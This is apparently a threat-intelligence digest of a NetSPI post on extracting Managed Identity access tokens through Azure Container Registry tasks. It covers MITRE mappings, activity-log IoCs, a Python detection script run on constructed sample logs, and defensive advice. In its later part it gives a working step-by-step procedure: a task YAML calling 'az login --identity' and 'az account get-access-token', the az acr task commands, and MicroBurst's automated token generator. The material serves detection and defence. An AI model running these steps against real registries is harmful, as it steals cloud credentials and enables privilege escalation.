Keypoints
- Attackers with Contributor (write) access on an ACR can create tasks that run arbitrary commands inside the ACR task container.
- Malicious task YAML can call az login --identity and az account get-access-token to obtain tokens for the Managed Identities attached to the registry.
- MicroBurst includes Invoke-AzACRTokenGenerator to automate creating tasks, running them, and collecting tokens using Az PowerShell cmdlets and REST APIs.
- The tool prompts interactively for subscriptions and ACR targets (supports multi-select) and can generate tokens for configurable scopes (e.g., management endpoint).
- Task runs produce output (including tokens) that can be read from the run logs; runs persist even if the task is deleted, potentially exposing tokens to Readers.
- IoCs provided include specific Azure activity log operations to monitor (task creation, schedule run, listLogSasUrl, task delete).
- Recommended mitigations: review and tighten permissions on ACRs, attached Managed Identities, stored task definitions, and monitor the listed activity operations.
MITRE Techniques
- [T1078.004] Valid Accounts: Cloud Accounts – The attack requires an account with Contributor (Write) access on the ACR (“The attacker has Contributor (Write) access on the ACR”).
- [T1528] Steal Application Access Token / [T1550.001] Use Alternate Authentication Material: Application Access Token – The task authenticates as the Managed Identity and requests tokens that are then reused by the attacker (“…the task authenticates to the Az CLI as the Managed Identity, then generates a token”).
- [T1059.001] Command and Scripting Interpreter: PowerShell – MicroBurst drives the attack from Az PowerShell module cmdlets plus REST calls (“uses a mix of the Az PowerShell module cmdlets and REST API calls”); the commands the task itself runs (‘az login --identity’, ‘az account get-access-token’) are Azure CLI invocations inside the task container.
- [T1648] Serverless Execution – Creating a malicious ACR Task so that the registry’s task service runs attacker-chosen commands (“The attacker creates a malicious YAML task file”); the task executes inside the ACR Task container and writes the tokens to its run output.
Indicators of Compromise
- [Azure Activity Operation Names] operations that indicate task creation, run and log access – Microsoft.ContainerRegistry/registries/tasks/write, Microsoft.ContainerRegistry/registries/scheduleRun/action and Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action, followed by Microsoft.ContainerRegistry/registries/tasks/delete when the attacker cleans up.
- [Task/file names] ACR task and YAML artifacts – the local YAML task file (taskfile) and sample_acr_task (example task name used to create, run and delete the malicious task).
- [CLI commands / YAML snippets] commands used to obtain tokens – ‘az login --identity’ and ‘az account get-access-token’ as cmd steps in the task YAML, used to retrieve Managed Identity tokens.
- [Tooling] automation function and module – Invoke-AzACRTokenGenerator, imported with Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1.
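The operation names above are only useful if they are correlated: a single tasks/write is routine CI activity, while a tasks/write followed by scheduleRun/action and runs/listLogSasUrl/action from the same principal against the same registry within minutes is the token-extraction pattern. The following detection is an added example, not code from the NetSPI post or from MicroBurst. It parses Azure Activity Log records (one JSON object per line, using the standard eventTimestamp, operationName.value, caller, resourceId and status.value fields), groups them by caller and registry, and raises an alert when the three operations occur in order within a time window; it also records whether the task was deleted afterwards, since the run and its log survive the delete. The log records, the registry names, the subscription ID and the callers are constructed sample data.

```python
"""Added example (not from the NetSPI post or MicroBurst): flag the ACR-task
token-extraction sequence in Azure Activity Log records.

Input is one JSON record per line using the Activity Log schema fields
eventTimestamp, operationName.value, caller, resourceId and status.value.
All records below are constructed sample data, not real logs.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Operation names listed as IoCs, in the order the attack performs them.
SEQUENCE = [
    "Microsoft.ContainerRegistry/registries/tasks/write",
    "Microsoft.ContainerRegistry/registries/scheduleRun/action",
    "Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action",
]
CLEANUP = "Microsoft.ContainerRegistry/registries/tasks/delete"
REGISTRY_MARKER = "/providers/Microsoft.ContainerRegistry/registries/"


def registry_id(resource_id):
    """Trim a task/run resource ID down to the registry it belongs to (lower-cased)."""
    i = resource_id.lower().find(REGISTRY_MARKER.lower())
    if i < 0:
        return None  # not an ACR resource at all
    tail = resource_id[i + len(REGISTRY_MARKER):]
    return (resource_id[:i + len(REGISTRY_MARKER)] + tail.split("/")[0]).lower()


def parse_records(lines):
    """Yield only the fields the detection needs from each JSON line."""
    for line in lines:
        if not line.strip():
            continue
        rec = json.loads(line)
        yield {
            "time": datetime.fromisoformat(rec["eventTimestamp"].replace("Z", "+00:00")),
            "op": rec["operationName"]["value"],
            "caller": rec["caller"].lower(),
            "registry": registry_id(rec["resourceId"]),
            "status": rec["status"]["value"],
        }


def detect(lines, window=timedelta(minutes=30)):
    """Return one alert per (caller, registry) that wrote a task, scheduled a run
    and then fetched run logs, in that order, within `window`."""
    buckets = defaultdict(list)
    for rec in parse_records(lines):
        # "Started" events duplicate the later "Succeeded" event for the same operation.
        if rec["status"] == "Started" or rec["registry"] is None:
            continue
        buckets[(rec["caller"], rec["registry"])].append(rec)

    alerts = []
    for (caller, registry), recs in buckets.items():
        recs.sort(key=lambda r: r["time"])
        stage, start = 0, None
        for rec in recs:
            if rec["op"] == SEQUENCE[0]:
                stage, start = 1, rec["time"]  # every task write (re)starts a chain
            elif stage and rec["op"] == SEQUENCE[stage] and rec["time"] - start <= window:
                stage += 1
                if stage == len(SEQUENCE):
                    alerts.append({
                        "caller": caller,
                        "registry": registry,
                        "task_written_at": start.isoformat(),
                        "logs_read_at": rec["time"].isoformat(),
                        # Deleting the task does not remove the run or its log,
                        # so a token printed there may still be readable.
                        "task_deleted": any(r["op"] == CLEANUP and r["time"] > rec["time"] for r in recs),
                    })
                    stage, start = 0, None
    return alerts


def _rec(ts, op, caller, resource, status="Succeeded"):
    """Build one constructed Activity Log line."""
    return json.dumps({"eventTimestamp": ts, "operationName": {"value": op},
                       "caller": caller, "resourceId": resource, "status": {"value": status}})


# Constructed sample resources (placeholder subscription ID and registry names).
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"
ACR = SUB + "/resourceGroups/rg-prod" + REGISTRY_MARKER + "acrprod"
DEV = SUB + "/resourceGroups/rg-dev" + REGISTRY_MARKER + "acrdev"

SAMPLE_LINES = [
    # Constructed: a build pipeline legitimately updating a task on another registry.
    _rec("2024-05-01T09:00:00Z", SEQUENCE[0], "ci-pipeline@contoso.com", DEV + "/tasks/build-nightly"),
    # Constructed: the full attack chain against acrprod, cleaned up with a task delete.
    _rec("2024-05-01T10:00:05Z", SEQUENCE[0], "attacker@contoso.com", ACR + "/tasks/sample_acr_task", "Started"),
    _rec("2024-05-01T10:00:06Z", SEQUENCE[0], "attacker@contoso.com", ACR + "/tasks/sample_acr_task"),
    _rec("2024-05-01T10:00:20Z", SEQUENCE[1], "attacker@contoso.com", ACR),
    _rec("2024-05-01T10:01:10Z", SEQUENCE[2], "attacker@contoso.com", ACR + "/runs/cb1"),
    _rec("2024-05-01T10:02:00Z", CLEANUP, "attacker@contoso.com", ACR + "/tasks/sample_acr_task"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LINES):
        print(json.dumps(alert, indent=2))
```

Running it on the sample prints a single alert for attacker@contoso.com against acrprod with task_deleted set to true; the pipeline's lone tasks/write on acrdev produces nothing. When task_deleted is true, treat the surviving run log as the place the token may still be sitting and review it (and who holds Reader on the registry) rather than assuming the delete cleaned up.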
To perform the token-extraction procedure manually with the Azure CLI:
- Authenticate with an account that has Contributor access to the target ACR and list the registries in scope with az acr list.
- Create a local YAML task file (here named taskfile) whose steps authenticate the task container as the registry’s Managed Identity and then request a token:
    version: v1.1.0
    steps:
      - cmd: az login --identity --allow-no-subscriptions
      - cmd: az account get-access-token
  For a user-assigned Managed Identity, add --username with that identity’s client ID (or resource ID) to the az login command; otherwise the CLI authenticates as the system-assigned identity.
- Create the task and attach the identity whose token you want: az acr task create --registry $ACRName --name sample_acr_task --file ./taskfile --context /dev/null --only-show-errors --assign-identity [system] (for a user-assigned identity, replace [system] with the identity’s full resource ID).
- Run it with az acr task run -n sample_acr_task -r $ACRName; the run output contains the access token printed by az account get-access-token.
- Optionally remove the task with az acr task delete -n sample_acr_task -r $ACRName -y. Deleting the task does not delete its runs: the run records and their logs (retrievable with az acr task logs) stay in the registry, so the token remains readable by anyone who can fetch run logs, potentially including Readers.
MicroBurst’s Invoke-AzACRTokenGenerator automates these steps using Az PowerShell cmdlets and REST API calls. Import the function (Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1) and run Invoke-AzACRTokenGenerator -Verbose. The function prompts interactively for the subscription(s) and ACR target(s) (multi-selection is supported), accepts a token scope (default: https://management.azure.com/), and returns a DataTable object. Assign the result to $tokens, or append to it with +=, to collect tokens for several scopes such as Management, Graph or Key Vault in one table.
Defenders should alert on the Azure activity operations listed above (a tasks/write followed by scheduleRun/action and runs/listLogSasUrl/action from the same principal on the same registry is the sequence to look for), review who holds Contributor on each registry and which Managed Identities are attached to it (and what those identities can reach), inspect stored task definitions (including task YAML kept in GitHub) for unexpected az login and get-access-token steps, limit Contributor-level access to registries, and remember that deleting a task leaves its runs and logs, and any token printed in them, readable in the registry. Read more: https://www.netspi.com/blog/technical/cloud-penetration-testing/automating-managed-identity-token-extraction-in-azure-container-registries/